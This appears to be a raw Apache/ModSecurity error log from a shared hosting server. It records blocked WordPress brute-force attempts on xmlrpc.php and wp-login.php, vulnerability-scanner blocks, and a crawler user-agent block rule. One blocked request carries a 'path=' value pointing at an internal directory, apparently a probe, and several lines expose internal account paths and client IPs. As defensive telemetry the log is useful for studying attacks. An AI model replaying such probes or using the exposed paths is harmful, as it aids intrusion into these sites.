[Tue May 26 14:34:22.645031 2026] [security2:error] [pid 626747:tid 626995] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViFhVF8Qmdmw_OMfLmTwAAAYA"]
[Tue May 26 14:34:22.709253 2026] [security2:error] [pid 626747:tid 626994] [client 154.161.32.97:56481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViFhVF8Qmdmw_OMfLmXwAAAX8"]
[Tue May 26 14:34:22.709379 2026] [security2:error] [pid 626747:tid 626994] [client 154.161.32.97:56481] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViFhVF8Qmdmw_OMfLmXwAAAX8"]
[Tue May 26 14:34:24.759334 2026] [security2:error] [pid 626747:tid 626878] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViGBVF8Qmdmw_OMfLmkQAAAQs"]
[Tue May 26 14:34:26.755193 2026] [security2:error] [pid 626747:tid 626964] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViGhVF8Qmdmw_OMfLm4AAAAWE"]
[Tue May 26 14:34:28.126375 2026] [security2:error] [pid 626747:tid 626996] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViGxVF8Qmdmw_OMfLnEgAAAYE"]
[Tue May 26 14:34:28.875751 2026] [security2:error] [pid 626747:tid 626892] [client 91.217.3.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViHBVF8Qmdmw_OMfLnMAAAARk"]
[Tue May 26 14:34:29.263006 2026] [security2:error] [pid 626747:tid 626934] [client 202.141.83.254:19943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViHRVF8Qmdmw_OMfLnTQAAAUM"]
[Tue May 26 14:34:29.263107 2026] [security2:error] [pid 626747:tid 626934] [client 202.141.83.254:19943] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViHRVF8Qmdmw_OMfLnTQAAAUM"]
[Tue May 26 14:34:31.018268 2026] [security2:error] [pid 626747:tid 626944] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViHhVF8Qmdmw_OMfLnfAAAAU0"]
[Tue May 26 14:34:32.511444 2026] [security2:error] [pid 626747:tid 626936] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViIBVF8Qmdmw_OMfLnrwAAAUU"]
[Tue May 26 14:34:33.051419 2026] [security2:error] [pid 626747:tid 626908] [client 173.239.254.135:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahViHRVF8Qmdmw_OMfLnYwABKTQ"]
[Tue May 26 14:34:34.951012 2026] [security2:error] [pid 626747:tid 626978] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViIhVF8Qmdmw_OMfLn9gAAAW8"]
[Tue May 26 14:34:37.082328 2026] [security2:error] [pid 626747:tid 626896] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViJBVF8Qmdmw_OMfLoIQAAAR0"]
[Tue May 26 14:34:37.384585 2026] [security2:error] [pid 626747:tid 626987] [client 172.98.32.36:31985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahViJRVF8Qmdmw_OMfLoKwAAAXg"]
[Tue May 26 14:34:39.380295 2026] [security2:error] [pid 626747:tid 626982] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViJhVF8Qmdmw_OMfLoUwAAAXM"]
[Tue May 26 14:34:39.804516 2026] [security2:error] [pid 626747:tid 626912] [client 202.141.83.254:5743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViJxVF8Qmdmw_OMfLobAAAAS0"]
[Tue May 26 14:34:39.804681 2026] [security2:error] [pid 626747:tid 626912] [client 202.141.83.254:5743] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViJxVF8Qmdmw_OMfLobAAAAS0"]
[Tue May 26 14:34:41.188592 2026] [security2:error] [pid 626747:tid 626889] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViKBVF8Qmdmw_OMfLokAAAARY"]
[Tue May 26 14:34:43.273375 2026] [security2:error] [pid 626747:tid 626963] [client 154.161.32.97:56483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViKxVF8Qmdmw_OMfLo3AAAAWA"]
[Tue May 26 14:34:43.273569 2026] [security2:error] [pid 626747:tid 626963] [client 154.161.32.97:56483] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViKxVF8Qmdmw_OMfLo3AAAAWA"]
[Tue May 26 14:34:43.343955 2026] [security2:error] [pid 626747:tid 626943] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViKhVF8Qmdmw_OMfLozwAAAUw"]
[Tue May 26 14:34:44.299220 2026] [security2:error] [pid 626747:tid 626889] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahViKhVF8Qmdmw_OMfLo2AAAARY"], referer: https://anujtradingco.com/top-deejay-headphones/
[Tue May 26 14:34:44.299249 2026] [security2:error] [pid 626747:tid 626992] [client 178.20.45.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahViKxVF8Qmdmw_OMfLo6QAAAX0"], referer: https://anujtradingco.com/top-deejay-headphones/
[Tue May 26 14:34:45.358770 2026] [security2:error] [pid 626747:tid 626920] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViLBVF8Qmdmw_OMfLpAQAAATU"]
[Tue May 26 14:34:47.735013 2026] [security2:error] [pid 626747:tid 626883] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViLxVF8Qmdmw_OMfLpQwAAARA"]
[Tue May 26 14:34:50.066084 2026] [security2:error] [pid 626747:tid 626883] [client 202.141.83.254:19945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViMhVF8Qmdmw_OMfLpnAAAARA"]
[Tue May 26 14:34:50.066215 2026] [security2:error] [pid 626747:tid 626883] [client 202.141.83.254:19945] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViMhVF8Qmdmw_OMfLpnAAAARA"]
[Tue May 26 14:34:50.117869 2026] [security2:error] [pid 626747:tid 626989] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViMRVF8Qmdmw_OMfLplAAAAXo"]
[Tue May 26 14:34:51.412958 2026] [security2:error] [pid 626747:tid 626928] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViMhVF8Qmdmw_OMfLpsAAAAT0"]
[Tue May 26 14:34:53.745888 2026] [security2:error] [pid 626747:tid 626906] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViNRVF8Qmdmw_OMfLp7QAAASc"]
[Tue May 26 14:34:55.274260 2026] [security2:error] [pid 626747:tid 626936] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViNhVF8Qmdmw_OMfLqHQAAAUU"]
[Tue May 26 14:34:57.341469 2026] [security2:error] [pid 626747:tid 626892] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViOBVF8Qmdmw_OMfLqaAAAARk"]
[Tue May 26 14:34:57.700151 2026] [security2:error] [pid 626747:tid 626925] [client 202.76.173.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViORVF8Qmdmw_OMfLqcwAAATo"]
[Tue May 26 14:34:57.936379 2026] [ssl:error] [pid 626747:tid 626954] [client 98.88.137.2:62278] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname www.api.dezka.mx provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:34:59.449680 2026] [security2:error] [pid 626747:tid 626953] [client 172.225.77.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahViOxVF8Qmdmw_OMfLqqwAAAVY"]
[Tue May 26 14:34:59.640364 2026] [security2:error] [pid 626747:tid 626921] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViOxVF8Qmdmw_OMfLqqAAAATY"]
[Tue May 26 14:35:00.511450 2026] [security2:error] [pid 626747:tid 626904] [client 202.141.83.254:19924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViPBVF8Qmdmw_OMfLq3wAAASU"]
[Tue May 26 14:35:00.511598 2026] [security2:error] [pid 626747:tid 626904] [client 202.141.83.254:19924] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViPBVF8Qmdmw_OMfLq3wAAASU"]
[Tue May 26 14:35:02.267756 2026] [security2:error] [pid 626747:tid 626959] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViPRVF8Qmdmw_OMfLrBwAAAVw"]
[Tue May 26 14:35:02.468445 2026] [autoindex:error] [pid 626747:tid 626993] [client 43.156.116.44:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://glorodbalsa.com
[Tue May 26 14:35:02.976694 2026] [security2:error] [pid 626747:tid 626929] [client 114.119.131.206:30667] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahViPhVF8Qmdmw_OMfLrIgAAAT4"], referer: http://haddingtonwines.com/cart?remove_item=f110a326be6999afdeb8e7002c0ce44d
[Tue May 26 14:35:04.080071 2026] [security2:error] [pid 626747:tid 626949] [client 154.161.32.97:57042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViQBVF8Qmdmw_OMfLrOwAAAVI"]
[Tue May 26 14:35:04.082019 2026] [security2:error] [pid 626747:tid 626949] [client 154.161.32.97:57042] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViQBVF8Qmdmw_OMfLrOwAAAVI"]
[Tue May 26 14:35:04.146826 2026] [security2:error] [pid 626747:tid 626821] [remote 52.18.195.140:57322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahViPxVF8Qmdmw_OMfLrNAABJkk"]
[Tue May 26 14:35:04.445640 2026] [security2:error] [pid 626747:tid 626934] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViQBVF8Qmdmw_OMfLrNwAAAUM"]
[Tue May 26 14:35:04.450609 2026] [security2:error] [pid 626747:tid 626954] [client 31.57.184.107:50334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-login.php"] [unique_id "ahViQBVF8Qmdmw_OMfLrPwAAAVc"], referer: https://t.co/
[Tue May 26 14:35:04.860848 2026] [security2:error] [pid 626747:tid 626963] [client 31.57.184.107:50980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-login.php"] [unique_id "ahViQBVF8Qmdmw_OMfLrTQAAAWA"], referer: https://wordpress.org/
[Tue May 26 14:35:05.507504 2026] [security2:error] [pid 626747:tid 626951] [client 4.201.75.230:5635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wk/index.php"] [unique_id "ahViQRVF8Qmdmw_OMfLrXgAAAVQ"]
[Tue May 26 14:35:06.172919 2026] [security2:error] [pid 626747:tid 626915] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViQRVF8Qmdmw_OMfLraAAAATA"]
[Tue May 26 14:35:07.081750 2026] [security2:error] [pid 626747:tid 626840] [remote 121.200.216.55:54372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahViQhVF8Qmdmw_OMfLrmgABdVw"]
[Tue May 26 14:35:07.706793 2026] [security2:error] [pid 626747:tid 626921] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViQxVF8Qmdmw_OMfLrpAAAATY"]
[Tue May 26 14:35:08.663325 2026] [security2:error] [pid 626747:tid 626755] [remote 74.7.241.58:58024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahViRBVF8Qmdmw_OMfLr7AABfQc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 14:35:08.832965 2026] [security2:error] [pid 626747:tid 626982] [client 85.208.96.208:62468] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/day/2024-11-07/"] [unique_id "ahViRBVF8Qmdmw_OMfLr-AAAAXM"]
[Tue May 26 14:35:08.833050 2026] [security2:error] [pid 626747:tid 626982] [client 85.208.96.208:62468] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/day/2024-11-07/"] [unique_id "ahViRBVF8Qmdmw_OMfLr-AAAAXM"]
[Tue May 26 14:35:08.932507 2026] [security2:error] [pid 626747:tid 626879] [client 31.57.184.107:51386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-login.php"] [unique_id "ahViRBVF8Qmdmw_OMfLr_QAAAQw"], referer: https://wordpress.org/
[Tue May 26 14:35:10.437934 2026] [security2:error] [pid 626747:tid 626930] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViRRVF8Qmdmw_OMfLsIgAAAT8"]
[Tue May 26 14:35:10.577020 2026] [autoindex:error] [pid 626747:tid 626962] [client 103.108.58.177:15595] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:35:11.128238 2026] [security2:error] [pid 626747:tid 626890] [client 202.141.83.254:5638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViRxVF8Qmdmw_OMfLsPQAAARc"]
[Tue May 26 14:35:11.128407 2026] [security2:error] [pid 626747:tid 626890] [client 202.141.83.254:5638] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViRxVF8Qmdmw_OMfLsPQAAARc"]
[Tue May 26 14:35:11.134659 2026] [core:crit] [pid 626747:tid 627000] (13)Permission denied: [client 157.55.39.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:35:12.795090 2026] [security2:error] [pid 626747:tid 626914] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViSBVF8Qmdmw_OMfLsagAAAS8"]
[Tue May 26 14:35:13.986459 2026] [security2:error] [pid 626747:tid 626975] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViSRVF8Qmdmw_OMfLsmAAAAWw"]
[Tue May 26 14:35:16.134695 2026] [security2:error] [pid 626747:tid 626989] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViSxVF8Qmdmw_OMfLs0AAAAXo"]
[Tue May 26 14:35:16.602796 2026] [core:crit] [pid 626747:tid 626882] (13)Permission denied: [client 52.167.144.140:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:35:17.996068 2026] [security2:error] [pid 626747:tid 626996] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViTRVF8Qmdmw_OMfLtDQAAAYE"]
